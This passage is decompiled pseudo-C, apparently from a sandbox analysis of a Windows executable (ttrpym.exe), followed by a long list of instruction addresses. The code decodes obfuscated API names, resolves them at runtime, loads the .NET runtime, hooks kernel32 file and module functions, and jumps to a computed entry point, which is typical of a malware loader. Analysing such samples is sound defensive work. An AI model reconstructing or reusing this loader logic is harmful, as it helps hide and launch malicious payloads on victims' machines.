                                                                                                                        					_v215 = 0xc;
                                                                                                                        					_v214 = 0x55;
                                                                                                                        					_v213 = 0x25;
                                                                                                                        					_v212 = 0x8c;
                                                                                                                        					_v211 = 0xf9;
                                                                                                                        					_v210 = 0x35;
                                                                                                                        					_v209 = 0x97;
                                                                                                                        					_v208 = 0xd0;
                                                                                                                        					_v207 = 0x87;
                                                                                                                        					_v206 = 0x7b;
                                                                                                                        					_v205 = 0xf;
                                                                                                                        					_v204 = 0xf4;
                                                                                                                        					_v203 = 0x76;
                                                                                                                        					_v202 = 0xb9;
                                                                                                                        					_v201 = 0x34;
                                                                                                                        					_v200 = 0xbf;
                                                                                                                        					_v199 = 0x1e;
                                                                                                                        					_v198 = 0xe7;
                                                                                                                        					_v197 = 0x78;
                                                                                                                        					_v196 = 0x98;
                                                                                                                        					_v195 = 0xe9;
                                                                                                                        					_v194 = 0x6f;
                                                                                                                        					_v193 = 0xb4;
                                                                                                                        					_v192 = 0;
                                                                                                                        					_t566 = E00402AB0( &_v224,  &_v792);
                                                                                                                        					_t796 = _t787 + 0x50;
                                                                                                                        					 *0x4236a8 = GetProcAddress(_v1008, _t566);
                                                                                                                        					__eflags =  *0x4236a8;
                                                                                                                        					_v977 = 0 |  *0x4236a8 != 0x00000000;
                                                                                                                        					asm("sbb ecx, ecx");
                                                                                                                        					_v181 =  ~(_v977 & 0x000000ff) + 1;
                                                                                                                        					__eflags = _v977 & 0x000000ff;
                                                                                                                        					if((_v977 & 0x000000ff) == 0) {
                                                                                                                        						_v181 = 1;
                                                                                                                        						goto L72;
                                                                                                                        					} else {
                                                                                                                        						_v2288 = 0;
                                                                                                                        						_t592 =  *0x4236a8(0x41b220, 0x41b210,  &_v2288); // executed
                                                                                                                        						_v1044 = _t592;
                                                                                                                        						__eflags = _v1044;
                                                                                                                        						if(_v1044 < 0) {
                                                                                                                        							_v181 = 1;
                                                                                                                        						}
                                                                                                                        						__eflags = _v181 & 0x000000ff;
                                                                                                                        						if((_v181 & 0x000000ff) != 0) {
                                                                                                                        							L70:
                                                                                                                        							L72:
                                                                                                                        							__eflags = _v181 & 0x000000ff;
                                                                                                                        							if((_v181 & 0x000000ff) == 0) {
                                                                                                                        								L78:
                                                                                                                        								 *0x423184 =  &_v2244;
                                                                                                                        								_t668 =  *0x423184; // 0xf3f310
                                                                                                                        								E00402F20( &_v940, _t668);
                                                                                                                        								 *0x423180 = E00402C40( &_v940);
                                                                                                                        								GetModuleFileNameA(0, "C:\Users\frontdesk\Desktop\ttrpym.exe", 0x105);
                                                                                                                        								GetModuleFileNameW(0, L"C:\\Users\\frontdesk\\Desktop\\ttrpym.exe", 0x105);
                                                                                                                        								E00401410("kernel32.dll", "GetModuleFileNameW", E004011C0, 0x4237c0);
                                                                                                                        								E00401410("kernel32.dll", "GetModuleFileNameA", E00401190, 0x4237bc);
                                                                                                                        								E00401410("kernel32.dll", "GetModuleHandleW", E00401150, 0x4237cc);
                                                                                                                        								E00401410("kernel32.dll", "GetModuleHandleA", E00401170, 0x4237c8);
                                                                                                                        								E00401410("kernel32.dll", "CreateFileA", 0x401050, 0x4237c4);
                                                                                                                        								E00401410("kernel32.dll", "CreateFileW", E004010D0, 0x4237d0);
                                                                                                                        								_v176 =  *((intOrPtr*)(_v2248 + 0x28)) + _v1000;
                                                                                                                        								goto _v176;
                                                                                                                        							}
                                                                                                                        							_v181 = 0;
                                                                                                                        							_v2624 = 0xe4;
                                                                                                                        							_v2623 = 0x31;
                                                                                                                        							_v2622 = 0x8b;
                                                                                                                        							_v2621 = 0x36;
                                                                                                                        							_v2620 = 0xa8;
                                                                                                                        							_v2619 = 0x16;
                                                                                                                        							_v2618 = 0x18;
                                                                                                                        							_v2617 = 0x5a;
                                                                                                                        							_v2616 = 0xcc;
                                                                                                                        							_v2615 = 0x31;
                                                                                                                        							_v2614 = 0x5e;
                                                                                                                        							_v2613 = 0x3b;
                                                                                                                        							_v2612 = 0xbc;
                                                                                                                        							_v2611 = 0xf1;
                                                                                                                        							_v2610 = 0x29;
                                                                                                                        							_v2609 = 0x91;
                                                                                                                        							_v2608 = 0xd6;
                                                                                                                        							_v2607 = 0xf3;
                                                                                                                        							_v2606 = 0x14;
                                                                                                                        							_v2605 = 0x7d;
                                                                                                                        							_v2604 = 0x8d;
                                                                                                                        							_v2603 = 0x76;
                                                                                                                        							_v2602 = 0xb9;
                                                                                                                        							_v2601 = 0x34;
                                                                                                                        							_v2600 = 0xbf;
                                                                                                                        							_v2599 = 0x1e;
                                                                                                                        							_v2598 = 0xe7;
                                                                                                                        							_v2597 = 0x78;
                                                                                                                        							_v2596 = 0x98;
                                                                                                                        							_v2595 = 0xe9;
                                                                                                                        							_v2594 = 0x6f;
                                                                                                                        							_v2593 = 0xb4;
                                                                                                                        							_v2592 = 0;
                                                                                                                        							_t584 = E00402AB0( &_v2624,  &_v2588);
                                                                                                                        							_t796 = _t796 + 8;
                                                                                                                        							 *0x4237b8 = GetProcAddress(_v1008, _t584);
                                                                                                                        							_v2628 =  *0x4237b8( &_v2244, 0x104,  &_v796);
                                                                                                                        							__eflags = _v2628;
                                                                                                                        							if(_v2628 != 0) {
                                                                                                                        								_v181 = 1;
                                                                                                                        								goto L78;
                                                                                                                        							}
                                                                                                                        							_t589 =  &_v2244 + 0xfffffffe;
                                                                                                                        							__eflags = _t589;
                                                                                                                        							_v3184 = _t589;
                                                                                                                        							do {
                                                                                                                        								_v3186 =  *((intOrPtr*)(_v3184 + 2));
                                                                                                                        								_v3184 = _v3184 + 2;
                                                                                                                        								__eflags = _v3186;
                                                                                                                        							} while (_v3186 != 0);
                                                                                                                        							memcpy(_v3184, L"mscorlib.dll", 6 << 2);
                                                                                                                        							_t796 = _t796 + 0xc;
                                                                                                                        							asm("movsw");
                                                                                                                        							goto L78;
                                                                                                                        						} else {
                                                                                                                        							_v2292 = 0;
                                                                                                                        							E00402F00( &_v2556, _v164);
                                                                                                                        							_t597 =  *((intOrPtr*)( *((intOrPtr*)( *_v2288 + 0xc))))(_v2288, E00402C40( &_v2556), 0x41b230,  &_v2292); // executed
                                                                                                                        							_v1044 = _t597;
                                                                                                                        							__eflags = _v1044;
                                                                                                                        							if(_v1044 < 0) {
                                                                                                                        								_v181 = 1;
                                                                                                                        							}
                                                                                                                        							__eflags = _v181 & 0x000000ff;
                                                                                                                        							if((_v181 & 0x000000ff) != 0) {
                                                                                                                        								L69:
                                                                                                                        								E00402D70( &_v2556);
                                                                                                                        								goto L70;
                                                                                                                        							}
                                                                                                                        							_v1044 =  *((intOrPtr*)( *((intOrPtr*)( *_v2292 + 0x10))))(_v2292,  &_v2244,  &_v168);
                                                                                                                        							__eflags = _v1044;
                                                                                                                        							if(_v1044 >= 0) {
                                                                                                                        								_t603 =  &_v2244 + 0xfffffffe;
                                                                                                                        								__eflags = _t603;
                                                                                                                        								_v3176 = _t603;
                                                                                                                        								do {
                                                                                                                        									_v3178 =  *((intOrPtr*)(_v3176 + 2));
                                                                                                                        									_v3176 = _v3176 + 2;
                                                                                                                        									__eflags = _v3178;
                                                                                                                        								} while (_v3178 != 0);
                                                                                                                        								memcpy(_v3176, L"mscorlib.dll", 6 << 2);
                                                                                                                        								_t796 = _t796 + 0xc;
                                                                                                                        								asm("movsw");
                                                                                                                        								goto L69;
                                                                                                                        							}
                                                                                                                        							_v181 = 1;
                                                                                                                        							goto L69;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_t618 = E00402AB0( &_v976,  &_v1080);
                                                                                                                        				_t803 = _t784 + 8;
                                                                                                                        				_v3092 = _t618;
                                                                                                                        				_v3096 =  &_v1604;
                                                                                                                        				while(1) {
                                                                                                                        					_t699 = _v3096;
                                                                                                                        					_t756 = _t699->i;
                                                                                                                        					_v3097 = _t756;
                                                                                                                        					if(_t756 !=  *_v3092) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					if(_v3097 == 0) {
                                                                                                                        						L7:
                                                                                                                        						_v3104 = 0;
                                                                                                                        						L9:
                                                                                                                        						_v3108 = _v3104;
                                                                                                                        						if(_v3108 != 0) {
                                                                                                                        							_t621 = E00402AB0( &_v1712,  &_v116);
                                                                                                                        							_t784 = _t803 + 8;
                                                                                                                        							_v3112 = _t621;
                                                                                                                        							_v3116 =  &_v1604;
                                                                                                                        							while(1) {
                                                                                                                        								_t701 = _v3116;
                                                                                                                        								_t759 = _t701->i;
                                                                                                                        								_v3117 = _t759;
                                                                                                                        								__eflags = _t759 -  *_v3112;
                                                                                                                        								if(_t759 !=  *_v3112) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								__eflags = _v3117;
                                                                                                                        								if(_v3117 == 0) {
                                                                                                                        									L16:
                                                                                                                        									_v3124 = 0;
                                                                                                                        									L18:
                                                                                                                        									_v3128 = _v3124;
                                                                                                                        									__eflags = _v3128;
                                                                                                                        									if(_v3128 != 0) {
                                                                                                                        										while(1) {
                                                                                                                        											L20:
                                                                                                                        											_t624 = Module32Next(_v172,  &_v1636);
                                                                                                                        											__eflags = _t624;
                                                                                                                        											if(_t624 == 0) {
                                                                                                                        												goto L40;
                                                                                                                        											}
                                                                                                                        											_t626 = E00402AB0( &_v976,  &_v1080);
                                                                                                                        											_t804 = _t784 + 8;
                                                                                                                        											_v3132 = _t626;
                                                                                                                        											_v3136 =  &_v1604;
                                                                                                                        											while(1) {
                                                                                                                        												_t627 = _v3136;
                                                                                                                        												_t704 = _t627->i;
                                                                                                                        												_v3137 = _t704;
                                                                                                                        												__eflags = _t704 -  *_v3132;
                                                                                                                        												if(_t704 !=  *_v3132) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												__eflags = _v3137;
                                                                                                                        												if(_v3137 == 0) {
                                                                                                                        													L26:
                                                                                                                        													_v3144 = 0;
                                                                                                                        													L28:
                                                                                                                        													_v3148 = _v3144;
                                                                                                                        													__eflags = _v3148;
                                                                                                                        													if(_v3148 != 0) {
                                                                                                                        														_t629 = E00402AB0( &_v1712,  &_v116);
                                                                                                                        														_t784 = _t804 + 8;
                                                                                                                        														_v3152 = _t629;
                                                                                                                        														_v3156 =  &_v1604;
                                                                                                                        														while(1) {
                                                                                                                        															_t630 = _v3156;
                                                                                                                        															_t707 = _t630->i;
                                                                                                                        															_v3157 = _t707;
                                                                                                                        															__eflags = _t707 -  *_v3152;
                                                                                                                        															if(_t707 !=  *_v3152) {
                                                                                                                        																break;
                                                                                                                        															}
                                                                                                                        															__eflags = _v3157;
                                                                                                                        															if(_v3157 == 0) {
                                                                                                                        																L35:
                                                                                                                        																_v3164 = 0;
                                                                                                                        																L37:
                                                                                                                        																_v3168 = _v3164;
                                                                                                                        																__eflags = _v3168;
                                                                                                                        																if(_v3168 != 0) {
                                                                                                                        																	goto L20;
                                                                                                                        																}
                                                                                                                        																CloseHandle(_v172);
                                                                                                                        																return 0;
                                                                                                                        															}
                                                                                                                        															_t630 = _v3156;
                                                                                                                        															_t709 = _t630->i;
                                                                                                                        															_v3158 = _t709;
                                                                                                                        															_t767 = _v3152;
                                                                                                                        															__eflags = _t709 -  *((intOrPtr*)(_t767 + 1));
                                                                                                                        															if(_t709 !=  *((intOrPtr*)(_t767 + 1))) {
                                                                                                                        																break;
                                                                                                                        															}
                                                                                                                        															_v3156 =  &(_v3156->i);
                                                                                                                        															_v3152 = _v3152 + 2;
                                                                                                                        															__eflags = _v3158;
                                                                                                                        															if(_v3158 != 0) {
                                                                                                                        																continue;
                                                                                                                        															}
                                                                                                                        															goto L35;
                                                                                                                        														}
                                                                                                                        														asm("sbb eax, eax");
                                                                                                                        														asm("sbb eax, 0xffffffff");
                                                                                                                        														_v3164 = _t630;
                                                                                                                        														goto L37;
                                                                                                                        													}
                                                                                                                        													CloseHandle(_v172);
                                                                                                                        													return 0;
                                                                                                                        												}
                                                                                                                        												_t627 = _v3136;
                                                                                                                        												_t710 = _t627->i;
                                                                                                                        												_v3138 = _t710;
                                                                                                                        												_t769 = _v3132;
                                                                                                                        												__eflags = _t710 -  *((intOrPtr*)(_t769 + 1));
                                                                                                                        												if(_t710 !=  *((intOrPtr*)(_t769 + 1))) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												_v3136 =  &(_v3136->i);
                                                                                                                        												_v3132 = _v3132 + 2;
                                                                                                                        												__eflags = _v3138;
                                                                                                                        												if(_v3138 != 0) {
                                                                                                                        													continue;
                                                                                                                        												}
                                                                                                                        												goto L26;
                                                                                                                        											}
                                                                                                                        											asm("sbb eax, eax");
                                                                                                                        											asm("sbb eax, 0xffffffff");
                                                                                                                        											_v3144 = _t627;
                                                                                                                        											goto L28;
                                                                                                                        										}
                                                                                                                        										goto L40;
                                                                                                                        									}
                                                                                                                        									CloseHandle(_v172);
                                                                                                                        									return 0;
                                                                                                                        								}
                                                                                                                        								_t701 = _v3116;
                                                                                                                        								_t770 = _t701->i;
                                                                                                                        								_v3118 = _t770;
                                                                                                                        								_t638 = _v3112;
                                                                                                                        								__eflags = _t770 -  *((intOrPtr*)(_t638 + 1));
                                                                                                                        								if(_t770 !=  *((intOrPtr*)(_t638 + 1))) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								_v3116 =  &(_v3116->i);
                                                                                                                        								_v3112 = _v3112 + 2;
                                                                                                                        								__eflags = _v3118;
                                                                                                                        								if(_v3118 != 0) {
                                                                                                                        									continue;
                                                                                                                        								}
                                                                                                                        								goto L16;
                                                                                                                        							}
                                                                                                                        							asm("sbb ecx, ecx");
                                                                                                                        							asm("sbb ecx, 0xffffffff");
                                                                                                                        							_v3124 = _t701;
                                                                                                                        							goto L18;
                                                                                                                        						}
                                                                                                                        						CloseHandle(_v172);
                                                                                                                        						return 0;
                                                                                                                        					}
                                                                                                                        					_t699 = _v3096;
                                                                                                                        					_t771 = _t699->i;
                                                                                                                        					_v3098 = _t771;
                                                                                                                        					if(_t771 !=  *((intOrPtr*)(_v3092 + 1))) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_v3096 =  &(_v3096->i);
                                                                                                                        					_v3092 = _v3092 + 2;
                                                                                                                        					if(_v3098 != 0) {
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					goto L7;
                                                                                                                        				}
                                                                                                                        				asm("sbb ecx, ecx");
                                                                                                                        				asm("sbb ecx, 0xffffffff");
                                                                                                                        				_v3104 = _t699;
                                                                                                                        				goto L9;
                                                                                                                        			}











































































































































































































































































































































































                                                                                                                        0x00401470
                                                                                                                        0x00401470
                                                                                                                        0x00401470
                                                                                                                        0x0040147b
                                                                                                                        0x0040147f
                                                                                                                        0x00401483
                                                                                                                        0x00401487
                                                                                                                        0x0040148b
                                                                                                                        0x0040148f
                                                                                                                        0x00401493
                                                                                                                        0x00401497
                                                                                                                        0x0040149b
                                                                                                                        0x0040149f
                                                                                                                        0x004014a3
                                                                                                                        0x004014a7
                                                                                                                        0x004014ab
                                                                                                                        0x004014af
                                                                                                                        0x004014b3
                                                                                                                        0x004014b7
                                                                                                                        0x004014bb
                                                                                                                        0x004014bf
                                                                                                                        0x004014c3
                                                                                                                        0x004014c7
                                                                                                                        0x004014cb
                                                                                                                        0x004014cf
                                                                                                                        0x004014d3
                                                                                                                        0x004014d7
                                                                                                                        0x004014db
                                                                                                                        0x004014df
                                                                                                                        0x004014e3
                                                                                                                        0x004014e7
                                                                                                                        0x004014eb
                                                                                                                        0x004014ef
                                                                                                                        0x004014f3
                                                                                                                        0x004014f7
                                                                                                                        0x004014fb
                                                                                                                        0x0040150f
                                                                                                                        0x00401510
                                                                                                                        0x00401515
                                                                                                                        0x00401518
                                                                                                                        0x00401522
                                                                                                                        0x004024a8
                                                                                                                        0x00000000
                                                                                                                        0x004024a8
                                                                                                                        0x00401531
                                                                                                                        0x00401536
                                                                                                                        0x0040153c
                                                                                                                        0x00401546
                                                                                                                        0x0040154d
                                                                                                                        0x00401554
                                                                                                                        0x0040155b
                                                                                                                        0x00401562
                                                                                                                        0x00401569
                                                                                                                        0x00401570
                                                                                                                        0x00401577
                                                                                                                        0x0040157e
                                                                                                                        0x00401585
                                                                                                                        0x0040158c
                                                                                                                        0x00401593
                                                                                                                        0x0040159a
                                                                                                                        0x004015a1
                                                                                                                        0x004015a8
                                                                                                                        0x004015af
                                                                                                                        0x004015b6
                                                                                                                        0x004015bd
                                                                                                                        0x004015c4
                                                                                                                        0x004015cb
                                                                                                                        0x004015d2
                                                                                                                        0x004015d9
                                                                                                                        0x004015e0
                                                                                                                        0x004015e7
                                                                                                                        0x004015ee
                                                                                                                        0x004015f5
                                                                                                                        0x004015fc
                                                                                                                        0x00401603
                                                                                                                        0x0040160a
                                                                                                                        0x00401611
                                                                                                                        0x00401618
                                                                                                                        0x0040161f
                                                                                                                        0x00401626
                                                                                                                        0x0040162d
                                                                                                                        0x00401634
                                                                                                                        0x0040163b
                                                                                                                        0x00401642
                                                                                                                        0x00401649
                                                                                                                        0x00401650
                                                                                                                        0x00401657
                                                                                                                        0x0040165e
                                                                                                                        0x00401665
                                                                                                                        0x0040166c
                                                                                                                        0x00401673
                                                                                                                        0x0040167a
                                                                                                                        0x00401681
                                                                                                                        0x00401688
                                                                                                                        0x0040168f
                                                                                                                        0x00401696
                                                                                                                        0x0040169d
                                                                                                                        0x004016a4
                                                                                                                        0x004016ab
                                                                                                                        0x004016b2
                                                                                                                        0x004016b9
                                                                                                                        0x004016c0
                                                                                                                        0x004016c7
                                                                                                                        0x004016ce
                                                                                                                        0x004016d5
                                                                                                                        0x004016dc
                                                                                                                        0x004016e3
                                                                                                                        0x004016ea
                                                                                                                        0x004016f1
                                                                                                                        0x004016f8
                                                                                                                        0x004016ff
                                                                                                                        0x00401706
                                                                                                                        0x0040170d
                                                                                                                        0x00401722
                                                                                                                        0x00401729
                                                                                                                        0x00401a31
                                                                                                                        0x00401a38
                                                                                                                        0x00401a46
                                                                                                                        0x00401a4c
                                                                                                                        0x00401a53
                                                                                                                        0x00401a5a
                                                                                                                        0x00401a61
                                                                                                                        0x00401a68
                                                                                                                        0x00401a6f
                                                                                                                        0x00401a76
                                                                                                                        0x00401a7d
                                                                                                                        0x00401a84
                                                                                                                        0x00401a8b
                                                                                                                        0x00401a92
                                                                                                                        0x00401a99
                                                                                                                        0x00401aa0
                                                                                                                        0x00401aa7
                                                                                                                        0x00401aae
                                                                                                                        0x00401ab5
                                                                                                                        0x00401abc
                                                                                                                        0x00401ac3
                                                                                                                        0x00401aca
                                                                                                                        0x00401ad1
                                                                                                                        0x00401ad8
                                                                                                                        0x00401adf
                                                                                                                        0x00401ae6
                                                                                                                        0x00401aed
                                                                                                                        0x00401af4
                                                                                                                        0x00401afb
                                                                                                                        0x00401b02
                                                                                                                        0x00401b09
                                                                                                                        0x00401b10
                                                                                                                        0x00401b14
                                                                                                                        0x00401b18
                                                                                                                        0x00401b1c
                                                                                                                        0x00401b20
                                                                                                                        0x00401b4a
                                                                                                                        0x00401b5e
                                                                                                                        0x00401b71
                                                                                                                        0x00401b74
                                                                                                                        0x00401b90
                                                                                                                        0x00401b98
                                                                                                                        0x00401b9e
                                                                                                                        0x00401bae
                                                                                                                        0x00401baf
                                                                                                                        0x00401bb4
                                                                                                                        0x00401bb7
                                                                                                                        0x00401bbd
                                                                                                                        0x00401bc4
                                                                                                                        0x00401bec
                                                                                                                        0x00401bc6
                                                                                                                        0x00401bd6
                                                                                                                        0x00401bdb
                                                                                                                        0x00401be4
                                                                                                                        0x00401be4
                                                                                                                        0x00401bfc
                                                                                                                        0x00401c08
                                                                                                                        0x00401c0d
                                                                                                                        0x00401c1e
                                                                                                                        0x00401c21
                                                                                                                        0x00401c3c
                                                                                                                        0x00401c3f
                                                                                                                        0x00401c4b
                                                                                                                        0x00401c51
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00401c5c
                                                                                                                        0x00401c62
                                                                                                                        0x00401c63
                                                                                                                        0x00401c74
                                                                                                                        0x00401c7b
                                                                                                                        0x00401c33
                                                                                                                        0x00401c33
                                                                                                                        0x00401c36
                                                                                                                        0x00401c36
                                                                                                                        0x00401c85
                                                                                                                        0x00401c85
                                                                                                                        0x00401c8b
                                                                                                                        0x00401c94
                                                                                                                        0x00401c94
                                                                                                                        0x00401c94
                                                                                                                        0x00401c95
                                                                                                                        0x00401c97
                                                                                                                        0x00401c9c
                                                                                                                        0x00401c9c
                                                                                                                        0x00401ca2
                                                                                                                        0x00401cab
                                                                                                                        0x00401cab
                                                                                                                        0x00401cab
                                                                                                                        0x00401cb7
                                                                                                                        0x00401cbb
                                                                                                                        0x00401cbb
                                                                                                                        0x00401cc1
                                                                                                                        0x00401cca
                                                                                                                        0x00401cca
                                                                                                                        0x00401cca
                                                                                                                        0x00401ccb
                                                                                                                        0x00401ccf
                                                                                                                        0x00401ccf
                                                                                                                        0x00401cd5
                                                                                                                        0x00401cde
                                                                                                                        0x00401cde
                                                                                                                        0x00401cde
                                                                                                                        0x00401ce4
                                                                                                                        0x00401ce4
                                                                                                                        0x00401ce7
                                                                                                                        0x00401cee
                                                                                                                        0x00401cee
                                                                                                                        0x00401cfd
                                                                                                                        0x00401d0c
                                                                                                                        0x00401d12
                                                                                                                        0x00401d21
                                                                                                                        0x00401d2d
                                                                                                                        0x00401d3a
                                                                                                                        0x00401d42
                                                                                                                        0x00401d74
                                                                                                                        0x00401d7d
                                                                                                                        0x00401d90
                                                                                                                        0x00401d98
                                                                                                                        0x00401da8
                                                                                                                        0x00401db1
                                                                                                                        0x00401dc7
                                                                                                                        0x00401dd2
                                                                                                                        0x00401dd3
                                                                                                                        0x00401de1
                                                                                                                        0x00401ded
                                                                                                                        0x00401e02
                                                                                                                        0x00401e14
                                                                                                                        0x00401e26
                                                                                                                        0x00401e35
                                                                                                                        0x00401e47
                                                                                                                        0x00401e56
                                                                                                                        0x00401e5c
                                                                                                                        0x00401e63
                                                                                                                        0x00401e6a
                                                                                                                        0x00401e71
                                                                                                                        0x00401e78
                                                                                                                        0x00401e7f
                                                                                                                        0x00401e86
                                                                                                                        0x00401e8d
                                                                                                                        0x00401e94
                                                                                                                        0x00401e9b
                                                                                                                        0x00401ea2
                                                                                                                        0x00401ea9
                                                                                                                        0x00401eb0
                                                                                                                        0x00401eb7
                                                                                                                        0x00401ebe
                                                                                                                        0x00401ec5
                                                                                                                        0x00401ecc
                                                                                                                        0x00401ed3
                                                                                                                        0x00401eda
                                                                                                                        0x00401ee1
                                                                                                                        0x00401ee8
                                                                                                                        0x00401eef
                                                                                                                        0x00401ef6
                                                                                                                        0x00401efd
                                                                                                                        0x00401f04
                                                                                                                        0x00401f0b
                                                                                                                        0x00401f12
                                                                                                                        0x00401f19
                                                                                                                        0x00401f20
                                                                                                                        0x00401f27
                                                                                                                        0x00401f2e
                                                                                                                        0x00401f35
                                                                                                                        0x00401f3c
                                                                                                                        0x00401f60
                                                                                                                        0x00401f66
                                                                                                                        0x00401f6d
                                                                                                                        0x00401f74
                                                                                                                        0x00401f7b
                                                                                                                        0x00401f82
                                                                                                                        0x00401f89
                                                                                                                        0x00401f90
                                                                                                                        0x00401f97
                                                                                                                        0x00401f9e
                                                                                                                        0x00401fa5
                                                                                                                        0x00401fac
                                                                                                                        0x00401fb3
                                                                                                                        0x00401fba
                                                                                                                        0x00401fc1
                                                                                                                        0x00401fc8
                                                                                                                        0x00401fcf
                                                                                                                        0x00401fd6
                                                                                                                        0x00401fdd
                                                                                                                        0x00401fe4
                                                                                                                        0x00401feb
                                                                                                                        0x00401ff2
                                                                                                                        0x00401ff9
                                                                                                                        0x00402000
                                                                                                                        0x00402007
                                                                                                                        0x0040200e
                                                                                                                        0x00402015
                                                                                                                        0x0040201c
                                                                                                                        0x00402023
                                                                                                                        0x0040202a
                                                                                                                        0x00402031
                                                                                                                        0x00402038
                                                                                                                        0x0040203f
                                                                                                                        0x00402046
                                                                                                                        0x0040205b
                                                                                                                        0x00402060
                                                                                                                        0x00402071
                                                                                                                        0x00402078
                                                                                                                        0x00402082
                                                                                                                        0x00402091
                                                                                                                        0x00402096
                                                                                                                        0x004020a3
                                                                                                                        0x004020a5
                                                                                                                        0x004021e6
                                                                                                                        0x00000000
                                                                                                                        0x004020ab
                                                                                                                        0x004020ab
                                                                                                                        0x004020c6
                                                                                                                        0x004020cc
                                                                                                                        0x004020d2
                                                                                                                        0x004020d9
                                                                                                                        0x004020db
                                                                                                                        0x004020db
                                                                                                                        0x004020e9
                                                                                                                        0x004020eb
                                                                                                                        0x004021e4
                                                                                                                        0x004021ed
                                                                                                                        0x004021f4
                                                                                                                        0x004021f6
                                                                                                                        0x00402389
                                                                                                                        0x0040238f
                                                                                                                        0x00402394
                                                                                                                        0x004023a1
                                                                                                                        0x004023b1
                                                                                                                        0x004023c2
                                                                                                                        0x004023d4
                                                                                                                        0x004023ee
                                                                                                                        0x0040240a
                                                                                                                        0x00402426
                                                                                                                        0x00402442
                                                                                                                        0x0040245e
                                                                                                                        0x0040247a
                                                                                                                        0x00402491
                                                                                                                        0x00402497
                                                                                                                        0x00402497
                                                                                                                        0x004021fc
                                                                                                                        0x00402203
                                                                                                                        0x0040220a
                                                                                                                        0x00402211
                                                                                                                        0x00402218
                                                                                                                        0x0040221f
                                                                                                                        0x00402226
                                                                                                                        0x0040222d
                                                                                                                        0x00402234
                                                                                                                        0x0040223b
                                                                                                                        0x00402242
                                                                                                                        0x00402249
                                                                                                                        0x00402250
                                                                                                                        0x00402257
                                                                                                                        0x0040225e
                                                                                                                        0x00402265
                                                                                                                        0x0040226c
                                                                                                                        0x00402273
                                                                                                                        0x0040227a
                                                                                                                        0x00402281
                                                                                                                        0x00402288
                                                                                                                        0x0040228f
                                                                                                                        0x00402296
                                                                                                                        0x0040229d
                                                                                                                        0x004022a4
                                                                                                                        0x004022ab
                                                                                                                        0x004022b2
                                                                                                                        0x004022b9
                                                                                                                        0x004022c0
                                                                                                                        0x004022c7
                                                                                                                        0x004022ce
                                                                                                                        0x004022d5
                                                                                                                        0x004022dc
                                                                                                                        0x004022e3
                                                                                                                        0x004022f8
                                                                                                                        0x004022fd
                                                                                                                        0x0040230e
                                                                                                                        0x0040232c
                                                                                                                        0x00402332
                                                                                                                        0x00402339
                                                                                                                        0x00402382
                                                                                                                        0x00000000
                                                                                                                        0x00402382
                                                                                                                        0x00402341
                                                                                                                        0x00402341
                                                                                                                        0x00402344
                                                                                                                        0x0040234a
                                                                                                                        0x00402354
                                                                                                                        0x0040235b
                                                                                                                        0x00402362
                                                                                                                        0x00402362
                                                                                                                        0x0040237c
                                                                                                                        0x0040237c
                                                                                                                        0x0040237e
                                                                                                                        0x00000000
                                                                                                                        0x004020f1
                                                                                                                        0x004020f1
                                                                                                                        0x00402108
                                                                                                                        0x00402137
                                                                                                                        0x00402139
                                                                                                                        0x0040213f
                                                                                                                        0x00402146
                                                                                                                        0x00402148
                                                                                                                        0x00402148
                                                                                                                        0x00402156
                                                                                                                        0x00402158
                                                                                                                        0x004021d9
                                                                                                                        0x004021df
                                                                                                                        0x00000000
                                                                                                                        0x004021df
                                                                                                                        0x0040217c
                                                                                                                        0x00402182
                                                                                                                        0x00402189
                                                                                                                        0x0040219a
                                                                                                                        0x0040219a
                                                                                                                        0x0040219d
                                                                                                                        0x004021a3
                                                                                                                        0x004021ad
                                                                                                                        0x004021b4
                                                                                                                        0x004021bb
                                                                                                                        0x004021bb
                                                                                                                        0x004021d5
                                                                                                                        0x004021d5
                                                                                                                        0x004021d7
                                                                                                                        0x00000000
                                                                                                                        0x004021d7
                                                                                                                        0x0040218b
                                                                                                                        0x00000000
                                                                                                                        0x0040218b
                                                                                                                        0x004020eb
                                                                                                                        0x004020a5
                                                                                                                        0x0040173d
                                                                                                                        0x00401742
                                                                                                                        0x00401745
                                                                                                                        0x00401751
                                                                                                                        0x00401757
                                                                                                                        0x00401757
                                                                                                                        0x0040175d
                                                                                                                        0x0040175f
                                                                                                                        0x0040176d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00401776
                                                                                                                        0x004017a9
                                                                                                                        0x004017a9
                                                                                                                        0x004017c0
                                                                                                                        0x004017c6
                                                                                                                        0x004017d3
                                                                                                                        0x004017f4
                                                                                                                        0x004017f9
                                                                                                                        0x004017fc
                                                                                                                        0x00401808
                                                                                                                        0x0040180e
                                                                                                                        0x0040180e
                                                                                                                        0x00401814
                                                                                                                        0x00401816
                                                                                                                        0x00401822
                                                                                                                        0x00401824
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00401826
                                                                                                                        0x0040182d
                                                                                                                        0x00401860
                                                                                                                        0x00401860
                                                                                                                        0x00401877
                                                                                                                        0x0040187d
                                                                                                                        0x00401883
                                                                                                                        0x0040188a
                                                                                                                        0x004018a0
                                                                                                                        0x004018a0
                                                                                                                        0x004018ae
                                                                                                                        0x004018b3
                                                                                                                        0x004018b5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004018c9
                                                                                                                        0x004018ce
                                                                                                                        0x004018d1
                                                                                                                        0x004018dd
                                                                                                                        0x004018e3
                                                                                                                        0x004018e3
                                                                                                                        0x004018e9
                                                                                                                        0x004018eb
                                                                                                                        0x004018f7
                                                                                                                        0x004018f9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004018fb
                                                                                                                        0x00401902
                                                                                                                        0x00401935
                                                                                                                        0x00401935
                                                                                                                        0x0040194c
                                                                                                                        0x00401952
                                                                                                                        0x00401958
                                                                                                                        0x0040195f
                                                                                                                        0x00401980
                                                                                                                        0x00401985
                                                                                                                        0x00401988
                                                                                                                        0x00401994
                                                                                                                        0x0040199a
                                                                                                                        0x0040199a
                                                                                                                        0x004019a0
